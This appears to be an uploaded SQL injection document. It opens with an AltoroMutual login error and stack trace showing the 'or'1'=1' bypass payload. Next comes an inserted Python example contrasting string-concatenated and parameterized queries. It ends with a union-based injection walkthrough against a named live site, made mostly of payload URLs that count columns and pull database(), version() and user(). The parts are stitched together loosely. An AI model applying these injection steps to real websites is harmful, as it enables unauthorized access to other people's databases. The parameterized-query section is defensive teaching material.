
'Or'1' 1' - An Error Has Occurred: Summary

This document describes an SQL injection error that occurred due to a syntax error in the query expression. It provides the error message and stack trace detailing that the error was caused by a missing operator in the username and password values, which contained malicious SQL code ('or'1'=1).

Uploaded by

Thirumala Kakani
'or'1'=1' ------

An Error Has Occurred


Summary:
Syntax error (missing operator) in query expression 'username = ''or'1'=1'' AND password = ''or'1'=1'''.

Error Message:
System.Data.OleDb.OleDbException: Syntax error (missing operator) in query expression 'username = ''or'1'=1'' AND
password = ''or'1'=1'''. at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling(OleDbHResult hr)
at System.Data.OleDb.OleDbCommand.ExecuteCommandTextForSingleResult(tagDBPARAMS dbParams, Object&
executeResult) at System.Data.OleDb.OleDbCommand.ExecuteCommandText(Object& executeResult) at
System.Data.OleDb.OleDbCommand.ExecuteCommand(CommandBehavior behavior, Object& executeResult) at
System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method) at
System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior) at
System.Data.OleDb.OleDbCommand.System.Data.IDbCommand.ExecuteReader(CommandBehavior behavior) at
System.Data.Common.DbDataAdapter.FillInternal(DataSet dataset, DataTable[] datatables, Int32 startRecord, Int32
maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) at
System.Data.Common.DbDataAdapter.Fill(DataSet dataSet, Int32 startRecord, Int32 maxRecords, String srcTable,
IDbCommand command, CommandBehavior behavior) at System.Data.Common.DbDataAdapter.Fill(DataSet dataSet,
String srcTable) at Altoro.Authentication.ValidateUser(String uName, String pWord) in
c:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs:line 68 at Altoro.Authentication.Page_Load(Object sender,
EventArgs e) in c:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs:line 33 at
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at
System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean
includeStagesAfterAsyncPoint)
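
The query expression in the error above is what string concatenation produces when the input contains quotes. The following is an added example, not code from the original document or from the application in the stack trace: it rebuilds that expression, then shows the same input handled by a parameterized query. SQLite stands in for the OleDb backend, and the table, sample row and function names are assumptions.

```python
import sqlite3

# Constructed input: the value shown in the error above, as entered in both fields.
PAYLOAD = "'or'1'=1'"

def make_db():
    """In-memory SQLite stand-in for the user table (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    # Plaintext password column only to mirror the query in the error message.
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('jsmith', 'constructed-sample')")
    return db

def build_concatenated(user, pw):
    """Vulnerable pattern: input is pasted into the SQL text, so its quotes become syntax."""
    return ("SELECT * FROM users WHERE username = '" + user +
            "' AND password = '" + pw + "'")

def login_concatenated(db, user, pw):
    try:
        row = db.execute(build_concatenated(user, pw)).fetchone()
        return "match" if row else "no match"
    except sqlite3.Error:
        # Log the detail server-side; return a generic result, not a stack trace.
        return "error"

def login_parameterized(db, user, pw):
    """Hardened pattern: placeholders keep the input as data, whatever it contains."""
    row = db.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?", (user, pw)
    ).fetchone()
    return "match" if row else "no match"

if __name__ == "__main__":
    db = make_db()
    print(build_concatenated(PAYLOAD, PAYLOAD))
    print(login_concatenated(db, PAYLOAD, PAYLOAD))
    print(login_parameterized(db, PAYLOAD, PAYLOAD))
    print(login_parameterized(db, "jsmith", "constructed-sample"))
```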
Union/error-based SQL injection:

In this SQL injection we first try the old method, that is, the authentication bypass method, but it won't
work, so we can try in a different manner.

If we open any website, it has a number of subpages.

E.g.: speako.pk

Every website has a number of subpages (tabs). We can go through any of the tabs and it will display the id
of that page; the id is displayed at the bottom left of the screen.

We open any tab and inject at the end of the URL. It displays one of the following:

- blank page

- error message

- data loss (some of the images or content are missing from the website)

For speako.pk, put the following at the end:

http://speako.pk/page.php?id=165order by 1-- (no changes)

http://speako.pk/page.php?id=165order by 14-- (no changes)

When we give order by 15, it displays a blank page (meaning there are 14 columns in that application or database).

http://speako.pk/page.php?id=165 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14

The above one is used to identify which columns are more vulnerable.

http://speako.pk/page.php?id=165 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13,14

http://speako.pk/page.php?id=165 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14

http://speako.pk/page.php?id=165 union select 1,user(),3,4,5,6,7,8,9,10,11,12,13,14
